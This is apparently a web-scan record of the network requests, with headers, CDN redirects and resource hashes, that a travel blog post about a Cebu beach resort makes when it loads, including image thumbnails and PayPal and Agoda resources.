Full URL: https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: a44f77059baad57ce9571aca55c43780fc11033ac84e0f74c0888016fcab810c

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 3923
cf-request-id: 093229307c00004ddc64b58000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:59:59 GMT
server: cloudflare
etag: "f53-5b2dfdff-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cxKFC8g11hxiEEFZFdbaOEMm3Em8UG%2BWLu33pnidX4SJWqzTWhoJuu9kijCgQOa7d9neLTPCNu%2FSlNE6ACafXNsmrr0w0HkCwYZD28v5R7L10%2FxrGRNmF4fiBCrIsh0%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98134ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 75cc064a1c7aeb6ce70fa8d0c787fd07
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

ogtong-cave-5-150x150.jpg
www.itravelrox.com/wp-content/uploads/2013/04/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg

5 KB
5 KB

56ms
55ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 39d955e7c4bd4349062518efd2bbbd842f5a0c432aa21bcb86b795cb1600fe40

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 5190
cf-request-id: 093229307c00004ddc36997000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:54:39 GMT
server: cloudflare
etag: "1446-5b2dfcbf-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=12FJ7%2BOMivQRXtAT0xf1wSZYH3Hhg7dZKt2PoE6OUTDWc9TndBZsTBiUW26uNqh2b%2F033CmCYFFs8twKaDvkvOpziOLZrN6IqK1s2nGwEahen%2BuI26D9iknyR2LPLvQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98144ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 723, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 84dcab9b6d4156a47b60b1f30d3cc152
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

budyong-beach-150x150.jpg
www.itravelrox.com/wp-content/uploads/2013/04/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg

7 KB
8 KB

53ms
52ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 80a87ba6f9617d7eaa77af58fff01a3eea07f28117c6b33b10dba083c64ed9d2

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 7424
cf-request-id: 093229307e00004ddc1b8c8000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:56:52 GMT
server: cloudflare
etag: "1d00-5b2dfd44-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OnBrn5m9UIEAyiQpV6O196AqvSVCUdGIDLJHKUVH63xsoWUX9xJXEtcEieNbNQWQn061N3F19CzDnJPG7HTIQ%2FfDhulXn0ia5856rdEkRtBaBLD7IduWGR3s9J4n7Yk%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d981f4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 4398ef3392783b94c397966eb9f92a8a
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

p1250186a-150x150.jpg
www.itravelrox.com/wp-content/uploads/2014/04/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg

6 KB
6 KB

52ms
51ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: d7f43a273b4fa10035fe8258a8c80c98a05ed4981838a13cc4ce061324a0795d

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 6118
cf-request-id: 093229307e00004ddc47169000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:31:47 GMT
server: cloudflare
etag: "17e6-5b2df763-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oYuA4YEwdVCUEswRxUm%2BpKiN3rvjcd9YraYBXHszbnAMSf4VWZGeMGUdFz1djN7XfDuyU1CiHdvEQPXkBp%2BVpIcBQBOnDBcqfzsg69Kv93w84m7CLAV6wLP0JptFDGs%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d981d4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 28281e0cf8760a21e10185ba1d6040cf
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

btn_donateCC_LG.gif
www.paypalobjects.com/en_US/i/btn/
Redirect Chain

https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif
https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif

1 KB
2 KB

97ms
33ms

Image
image/webp

104.111.228.123
AKAMAI-AS

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

104.111.228.123 Frankfurt am Main, Germany, ASN16625 (AKAMAI-AS, US),

Reverse DNS

a104-111-228-123.deploy.static.akamaitechnologies.com

Software

Akamai Image Manager /

Resource Hash

7ee6e85a2f79ff3a3acc9655f71db591b468f6db903542ad66aff7451779f2ff

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
x-content-type-options: nosniff
x-check-cacheable: YES
x-serial: 1483
etag: "dWrYZ+935H5E6HTlGcMhqTzjKO1EMA4bNVj6vFiR28w"
strict-transport-security: max-age=31536000
content-type: image/webp
cache-control: private, no-transform, max-age=43200
last-modified: Mon, 01 Mar 2021 02:51:00 GMT
content-length: 1412
server: Akamai Image Manager
expires: Fri, 02 Apr 2021 15:11:06 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
via: 1.1 varnish, 1.1 varnish
x-timer: S1617333066.750764,VS0,VE167
x-served-by: cache-hhn4021-HHN, cache-cph20637-CPH
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-cache: MISS, MISS
location: https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif
cache-control: max-age=0, no-cache, no-store, must-revalidate
paypal-debug-id: 11bacc7a1404d
accept-ranges: bytes
dc: phx-origin-www-2.paypal.com
content-length: 0
x-cache-hits: 0, 0

GET
H2

200

airbnb-banner.png
www.itravelrox.com/wp-content/uploads/2016/07/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png
https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png

109 KB
110 KB

96ms
96ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 8136e97fa493bde6d937cdc4052e3f395be940c416beeb1a9f1b961fe55a9c45

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 111895
cf-request-id: 093229307d00004ddc1c882000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 06:00:37 GMT
server: cloudflare
etag: "1b517-5b2de205-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=B8HON%2FG7krf8I1%2BpxAIsKGLct237O5It8TocBF5shVeiQwaPp6DM04%2BrY9o8SlNIzOpP9pd0HKrUsvQoCPYEgXVOYZsbCcsF4vY8JSlu%2F%2F%2FTD1BO7NWY%2BDZZDf6YbLw%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98184ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 565, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 1f2396dda63d4dbd1611c7b96d1be3d6
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

/ Show response
www.agoda.com/
Redirect Chain

https://banner.agoda.com/js/show_ads.js
https://www.agoda.com/

0
0

154ms
89ms

Script
text/html

184.31.81.115
AKAMAI-ASN1

General

Check archive.org

Show headers Download Go to

Full URL: https://www.agoda.com/
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 184.31.81.115 Frankfurt am Main, Germany, ASN20940 (AKAMAI-ASN1, NL),
Reverse DNS: a184-31-81-115.deploy.static.akamaitechnologies.com
Software: /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

access-control-expose-headers: ag-correlation-id
access-control-allow-credentials: true
access-control-allow-headers: Content-Type
access-control-allow-methods: GET,POST

Redirect headers

location: https://www.agoda.com
date: Fri, 02 Apr 2021 03:11:06 GMT
server: BigIP
content-length: 0

GET
H2 200 sherpa_init1_04.min.js Show response
cdn0.agoda.net/images/sherpa/js/ 10 KB
3 KB 97ms
31ms Script
application/javascript 104.111.235.205
AKAMAI-AS

General

Check archive.org

Show headers Download Go to

Full URL: https://cdn0.agoda.net/images/sherpa/js/sherpa_init1_04.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 104.111.235.205 Frankfurt am Main, Germany, ASN16625 (AKAMAI-AS, US),
Reverse DNS: a104-111-235-205.deploy.static.akamaitechnologies.com
Software: Akamai Resource Optimizer /
Resource Hash: 8b66fdc59617affc4a4e2210482eb74bdbf629e4650b256a3b069be640ac5552

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
last-modified: Sun, 21 Mar 2021 20:11:12 GMT
server: Akamai Resource Optimizer
x-dc: ASH
etag: W/"fab8f19f561dd31:0"
x-cache-status: HIT
content-type: application/javascript
access-control-allow-origin: *
cache-control: max-age=1616304
timing-allow-origin: *
content-length: 2650
expires: Tue, 20 Apr 2021 20:09:29 GMT

GET
H2

200

map25-redish.png
www.itravelrox.com/wp-content/themes/zerif-lite/images/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png

992 B
1 KB

53ms
53ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: dd316557f88752156efe3126b4781f9e0a730f84c1b86499195061cbbb3644c0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 992
cf-request-id: 093229308000004ddc531c0000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: "3e0-5799af21-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XVF%2BHErr7oKfve6Xzn73qI9p6%2FxIjSnQjD3crgNye9Ug5TrKlG3GoIySYrtiNeQ8qqiP0pLTQjvpJNwAA8Q9Bkd7iykyEHgyRyGQ4Mql5ajkKndNrpbJZo%2F99X%2F%2BgOA%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98254ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png
content-type: text/html; charset=UTF-8
cdn-cache: EXPIRED
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 1befa2e08902c2c87c93cf10d8697700
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

envelope4-green.png
www.itravelrox.com/wp-content/themes/zerif-lite/images/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png

949 B
1 KB

50ms
50ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: e8cae4e2790d252cf5d536a2d48df9318883f3c947ac75b4114ea66c03f12722

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 949
cf-request-id: 093229307d00004ddc8105a000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: "3b5-5799af21-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=U09VKKSH7CI%2BUxkKXV3SM7Ftw3NZnKDypL4EpTvzrz9hbtiLeO7w%2FsnHj24oFFzKpqC8Xj141XpyedlaWjzFOrj5%2FmL%2FQ5oTpesSsxb2i2pe%2BSa%2FrBO8iOQv5sBPTF8%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d981b4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 151f923b25a5e7fb3cc2a55661f14b44
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

telephone65-blue.png
www.itravelrox.com/wp-content/themes/zerif-lite/images/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png

1 KB
1 KB

56ms
55ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 1ae5085d7d223dfc04d84ac29d21a0effd2034c0490ca1a2379e8595fb254f6e

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 1187
cf-request-id: 093229307f00004ddc4fb97000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: "4a3-5799af21-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=X%2BtzKHyIgA04EfZBY5S6UKPTN5CrUZU9CkGu%2BmqSTrTenbHRIezRVF4SKftl8Mjx0sonqAhldKBec3nuEHvB9uD4hEa%2FO1rUcMJymJkuNdj979eLKcGMr1PYmy6MLOU%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98214ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

